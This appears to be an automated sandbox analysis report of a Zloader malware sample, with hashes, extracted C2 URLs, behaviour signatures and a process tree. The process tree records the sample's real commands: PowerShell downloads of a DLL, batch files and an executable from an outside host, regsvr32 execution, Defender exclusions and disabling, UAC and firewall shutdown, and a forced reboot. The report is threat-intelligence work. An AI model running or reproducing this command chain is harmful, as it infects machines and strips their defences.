Analysis

  • max time kernel
    53s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-08-2021 13:49

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    42a3e6ae86fe540cfc106f4edc55eccc.exe

  • Size

    165KB

  • MD5

    42a3e6ae86fe540cfc106f4edc55eccc

  • SHA1

    5a43baf8b4e0150ad0228a13da2000311f36f823

  • SHA256

    7ba99f8f77a2e660f1837cad9d169ccf892154da5b2651e4e6e66efddd61944c

  • SHA512

    25d05657f8f927c438ff5240f9f29e8c695e13e8664e822f729c01055026b2ef66ccbebadc0931d5ba488ff369c6dbd1c09055b99ea0f374a37ff6c3bca665c4

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe
    "C:\Users\Admin\AppData\Local\Temp\42a3e6ae86fe540cfc106f4edc55eccc.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://pornotublovers.com/JavaE.dll -OutFile JavaE.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2580
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaE.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaE.dll
          4⤵
          • Loads dropped DLL
          PID:2232
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:1300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:3544
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:4036
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:3156
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:3184
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:432
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:3976
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
                        4⤵
                          PID:2032
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
                          4⤵
                            PID:1284
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
                            4⤵
                              PID:648
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
                              4⤵
                                PID:3444
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
                                4⤵
                                  PID:2096
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
                                  4⤵
                                    PID:3560
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
                                    4⤵
                                      PID:3712
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
                                      4⤵
                                        PID:3568
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -command "Set-MpPreference -PUAProtection disable"
                                        4⤵
                                          PID:1928
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -command "netsh advfirewall set allprofiles state off"
                                          4⤵
                                            PID:3352
                                            • C:\Windows\system32\netsh.exe
                                              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                              5⤵
                                                PID:664
                                            • C:\Windows\system32\shutdown.exe
                                              shutdown.exe /r /f /t 00
                                              4⤵
                                                PID:3928
                                        • C:\Windows\system32\LogonUI.exe
                                          "LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
                                          1⤵
                                            PID:820

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Persistence

                                          Modify Existing Service

                                          1
                                          T1031

                                          Registry Run Keys / Startup Folder

                                          1
                                          T1060

                                          Defense Evasion

                                          Modify Registry

                                          1
                                          T1112

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                            MD5

                                            56efdb5a0f10b5eece165de4f8c9d799

                                            SHA1

                                            fa5de7ca343b018c3bfeab692545eb544c244e16

                                            SHA256

                                            6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

                                            SHA512

                                            91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            3293ffae2a4a326afd39f120263a0932

                                            SHA1

                                            444f9e2593016f8140ae08caea485c3fa80641f4

                                            SHA256

                                            ab4b898db6194e729a6856a3a617b9989fe75da941dff035853162aceb020f6f

                                            SHA512

                                            dc8feaa644a5a400ba1cf5bdcb304c7157ae52fea06e5f0f185c8fe0a5c4649f68d004c4ce7fd0ed4ee1363771438e43aaa68f63b18e16768cf701264f52ccb5

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            ad894c3fc8c0634bf8343c40a8e802cd

                                            SHA1

                                            51f8c2eada6bd481153c44de9a0bd3acfb0ee6f6

                                            SHA256

                                            e432a5b4a6a03b58528bb8316e805ca7ee864235a3081b77ba1095ccac646d31

                                            SHA512

                                            a5663b7d5fb6f51e1e703af05ac3c07cabaeb5b25f27e0d2de94cce7feb7a96e59e3db72d19bc842698d6ba939e44e297ec0efb3458bbdcb2072f8eecc8dc3fa

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            8a91f86e0322d0a6b64ef4f9fa8b38b9

                                            SHA1

                                            14ed7e568a37fd4756139ad21e699b817ece2c71

                                            SHA256

                                            34a7e8b27ea8dbeeed485c9645417b2b64e7edd1297966df3f3da9bc594af840

                                            SHA512

                                            7de8c2b50baf1966da488796a44dc47fefe8282ba0348d5e4d91edbfd249e5e71f983ca4d2a0ed7fcd3ae1644b7477a662e703bc4200c0218b3d66b5cffa4a55

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            842be8edc6248564d49884250b3142cd

                                            SHA1

                                            3afea11574005db481d52ca901a2a1759a6cee84

                                            SHA256

                                            43156eb6303253be2c4c00732ededb2622825e7e0b234376efa3ad170b7c692b

                                            SHA512

                                            1a6775d31df2d3e55a3b2db19162ab01cdee48af86e7c1c263603971f00072d4125821c0198c8166b364b96399a687c31c851d9e611c59a3cd8ed72065b906e2

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            d7f45a29631d554f089aa1d3a89fea42

                                            SHA1

                                            740abb69db4d10b93188c5c34284dada910c0ffb

                                            SHA256

                                            b72687eeecb800145397dde08b2bc61c90c4ef58e18340aa6b78c4ca3aa5bccb

                                            SHA512

                                            85fd3f4f87d6ed5914202e6ca4ec1d1f248e82311af9fe3698820108e896ada0fb00bfd18ac41e473df7d83aa0551379d3c5fb2a4cea7f6d8ca94c8612819e09

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            65d818825626930a2ea174bb9c726195

                                            SHA1

                                            8f134fbd7fd006f7c79ae4437afae53fe2371d23

                                            SHA256

                                            12dd86afcbaee6fecebb939ff34947a5aac8879e3d41397e53627dc82bea701e

                                            SHA512

                                            29f0998bad70aabb429bbdd60ab251d93a0135df7b7f3e508270c9f674f0a340bdf1be8062dbff09850d53f9959bff89e79749d185771d18f59757de1b4a624f

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            d259c63340ff72a9b1f7cccbc5042955

                                            SHA1

                                            ce665e24d764b1eb7515134cf8b4beb98d7ee016

                                            SHA256

                                            4fd6a4b25fec0e6232f6e3c7571426fea207f1a9ccb210975c2ed98c27a9e906

                                            SHA512

                                            1211a61e84b159ea5516690fbad4472cb6bc9bba275dab9a960c9ea2f2621ea85bb2cb18589e4b54296865e9651b4f2f29508eafeb9034463a61aac69e68ea01

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            ec5271dd81ce791c91ac44ea33fff370

                                            SHA1

                                            5f4d9b83944e57046df19684f57f49690d031b48

                                            SHA256

                                            2af25af4eb256fd7a6c780edbaac6a19fd803f1e57766c6fba5c03f9ea23f578

                                            SHA512

                                            4575a11f74ac8d8cf96d9398b27c8a95d5aa9d7216fbf40f1969dc8c7a61d308b8923151821aaa6df96dcb9ca452842b6456bff72a844a3cb8f7273d7aa143f2

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            f409ee881353b856c75c706eef2960dc

                                            SHA1

                                            39338e8e4e7b9e746bc250e58aad9679e34b513d

                                            SHA256

                                            4cc19e060e4b8b96edafd0662c811b7202549c24993fd06db7378913e923c268

                                            SHA512

                                            684f2335a0153ecee8fa54f0262b83843990fde939ba0ff7cb8170d1ade8baf4bbac71865886d6ff623532ca9a74feb027d0986f1d5be1061f727f40ce372fce

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            24e76fefc8c752e1e835deee4324ac3c

                                            SHA1

                                            ede3055fb5982a528a332cfd14509bc62d9b661f

                                            SHA256

                                            04083ba64079cca5c35ed8b7388ca64c14b60ef3238ff8643495456159bf306e

                                            SHA512

                                            07a2e207f56ec4b307249224cfc7d13e2076cbfdf47dd88b378fb1c2c08826e0bf268a57f650ec4404310dd9fb4eb53078c7e13f94ad0c3b9860853a35a075dc

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            a3ec6529be6d680dccdd334a19df08f3

                                            SHA1

                                            9ff7b60620a2c275fc41056c3a998ce3bd27e681

                                            SHA256

                                            8ebcaed614fadee24f18d136515a38c67a2a36e7597bacdf2ef6409a26813f66

                                            SHA512

                                            0ca8e99ab48b09085929d21ed0c4a5f32dd5d906068dbbf6c045d979964c0737900825e2dad295b6545f28c5b55bc79c53721a079f0143146608924ff7b9579c

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            MD5

                                            b33818ecfdd7438b95f1d43e876b9ea0

                                            SHA1

                                            e1aa79a371183771b4ab3b80c40c32a27a19c196

                                            SHA256

                                            c0dc4bc3abdc0a66534f5f00b95b1004b3074c57c1a2ea3639cd3ba0186af87c

                                            SHA512

                                            48cd63fe6bdff3e69fcddaefbeb132ebf94af6e51c88a773e6fb2751b70e294fe03cfc42de1977cfcd6d13077b993de004f1f49a32948de71adfe026aced1f5d

                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                                            MD5

                                            01d416e7915dfd9a2ca0301a02953a3b

                                            SHA1

                                            b53467be2ca6f37a1b871f9e8f1b1e60af24d72d

                                            SHA256

                                            1f2c81f0733961b7d585e68d31152ee2c32bbbadb081168ef6ecbb02b28bf061

                                            SHA512

                                            4f939988b52f4f2c4c2d9f55d2e3aa3cdf3e024fd2d97048982f0db4918f4198d1192f964a3000c063ceaa31b6fa85c72c150108ca63b66f6b29d046127428c6

                                          • C:\Users\Admin\AppData\Roaming\JavaE.dll
                                            MD5

                                            a9dd9b9eff47af724436e2abdcd5ce6c

                                            SHA1

                                            1a9c9258f0345f5edddd933a7bd15ec42be51f8e

                                            SHA256

                                            cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

                                            SHA512

                                            28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

                                          • C:\Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • C:\Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • C:\Users\Admin\AppData\Roaming\nsudo.bat
                                            MD5

                                            995c3f852ca1e81fc395a5c46b06cb9e

                                            SHA1

                                            0bc6bc2e425eef07669fa877573b9ba5513ae833

                                            SHA256

                                            81c64df94f955a49ea7b12ed58098b3dd43c02a28c2f3484c9d4aec0929ddfeb

                                            SHA512

                                            62dd4f3051917942ee5cae765f4fa0f4da96c49eafd4f00a978f84ddf139488e78a896ff3bdd307dc7d0bfe1902525aa446d7878f016c5ce895bdaee524eebaf

                                          • \Users\Admin\AppData\Roaming\JavaE.dll
                                            MD5

                                            a9dd9b9eff47af724436e2abdcd5ce6c

                                            SHA1

                                            1a9c9258f0345f5edddd933a7bd15ec42be51f8e

                                            SHA256

                                            cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

                                            SHA512

                                            28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

                                          • memory/432-200-0x0000000000000000-mapping.dmp
                                          • memory/648-299-0x000001DCFB7C3000-0x000001DCFB7C5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/648-286-0x0000000000000000-mapping.dmp
                                          • memory/648-297-0x000001DCFB7C0000-0x000001DCFB7C2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/648-324-0x000001DCFB7C6000-0x000001DCFB7C8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/648-341-0x000001DCFB7C8000-0x000001DCFB7C9000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/664-557-0x0000000000000000-mapping.dmp
                                          • memory/1284-251-0x000001411D1A0000-0x000001411D1A2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1284-245-0x0000000000000000-mapping.dmp
                                          • memory/1284-295-0x000001411D1A8000-0x000001411D1A9000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1284-282-0x000001411D1A6000-0x000001411D1A8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1284-252-0x000001411D1A3000-0x000001411D1A5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1300-144-0x0000000000000000-mapping.dmp
                                          • memory/1300-161-0x0000000000610000-0x0000000000636000-memory.dmp
                                            Filesize

                                            152KB

                                          • memory/1656-114-0x0000000000000000-mapping.dmp
                                          • memory/1928-541-0x000001A552276000-0x000001A552278000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1928-558-0x000001A552278000-0x000001A552279000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1928-499-0x0000000000000000-mapping.dmp
                                          • memory/1928-513-0x000001A552270000-0x000001A552272000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1928-514-0x000001A552273000-0x000001A552275000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2032-211-0x0000021E36EE3000-0x0000021E36EE5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2032-241-0x0000021E36EE6000-0x0000021E36EE8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2032-210-0x0000021E36EE0000-0x0000021E36EE2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2032-204-0x0000000000000000-mapping.dmp
                                          • memory/2096-413-0x000002B8F5F48000-0x000002B8F5F49000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/2096-371-0x0000000000000000-mapping.dmp
                                          • memory/2096-393-0x000002B8F5F40000-0x000002B8F5F42000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2096-395-0x000002B8F5F43000-0x000002B8F5F45000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2096-397-0x000002B8F5F46000-0x000002B8F5F48000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2232-143-0x0000000010000000-0x0000000010129000-memory.dmp
                                            Filesize

                                            1.2MB

                                          • memory/2232-140-0x0000000000000000-mapping.dmp
                                          • memory/2232-142-0x0000000002EF0000-0x0000000002EF1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/2292-138-0x0000000000000000-mapping.dmp
                                          • memory/2580-123-0x000001EF78CA0000-0x000001EF78CA2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2580-124-0x000001EF78CA3000-0x000001EF78CA5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/2580-122-0x000001EF79570000-0x000001EF79571000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/2580-116-0x0000000000000000-mapping.dmp
                                          • memory/2580-127-0x000001EF79720000-0x000001EF79721000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/2580-133-0x000001EF78CA6000-0x000001EF78CA8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3156-175-0x0000000000000000-mapping.dmp
                                          • memory/3184-198-0x0000029DD2426000-0x0000029DD2428000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3184-193-0x0000029DD2420000-0x0000029DD2422000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3184-194-0x0000029DD2423000-0x0000029DD2425000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3184-176-0x0000000000000000-mapping.dmp
                                          • memory/3352-544-0x0000000000000000-mapping.dmp
                                          • memory/3352-563-0x000001B3F0C66000-0x000001B3F0C68000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3352-559-0x000001B3F0C60000-0x000001B3F0C62000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3352-560-0x000001B3F0C63000-0x000001B3F0C65000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3444-342-0x000001E826510000-0x000001E826512000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3444-369-0x000001E826518000-0x000001E826519000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3444-328-0x0000000000000000-mapping.dmp
                                          • memory/3444-343-0x000001E826513000-0x000001E826515000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3444-368-0x000001E826516000-0x000001E826518000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3544-147-0x0000000000000000-mapping.dmp
                                          • memory/3544-162-0x000001A6E2BB0000-0x000001A6E2BB2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3544-163-0x000001A6E2BB3000-0x000001A6E2BB5000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3544-174-0x000001A6E2BB6000-0x000001A6E2BB8000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3560-450-0x000001E93C976000-0x000001E93C978000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3560-412-0x0000000000000000-mapping.dmp
                                          • memory/3560-448-0x000001E93C970000-0x000001E93C972000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3560-449-0x000001E93C973000-0x000001E93C975000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3560-467-0x000001E93C978000-0x000001E93C979000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3568-512-0x00000171FAE76000-0x00000171FAE78000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3568-493-0x00000171FAE73000-0x00000171FAE75000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3568-479-0x0000000000000000-mapping.dmp
                                          • memory/3568-492-0x00000171FAE70000-0x00000171FAE72000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3712-469-0x0000026F0AE93000-0x0000026F0AE95000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3712-476-0x0000026F0AE96000-0x0000026F0AE98000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3712-468-0x0000026F0AE90000-0x0000026F0AE92000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3712-454-0x0000000000000000-mapping.dmp
                                          • memory/3928-562-0x0000000000000000-mapping.dmp
                                          • memory/3976-202-0x0000000000000000-mapping.dmp
                                          • memory/4036-172-0x0000000000000000-mapping.dmp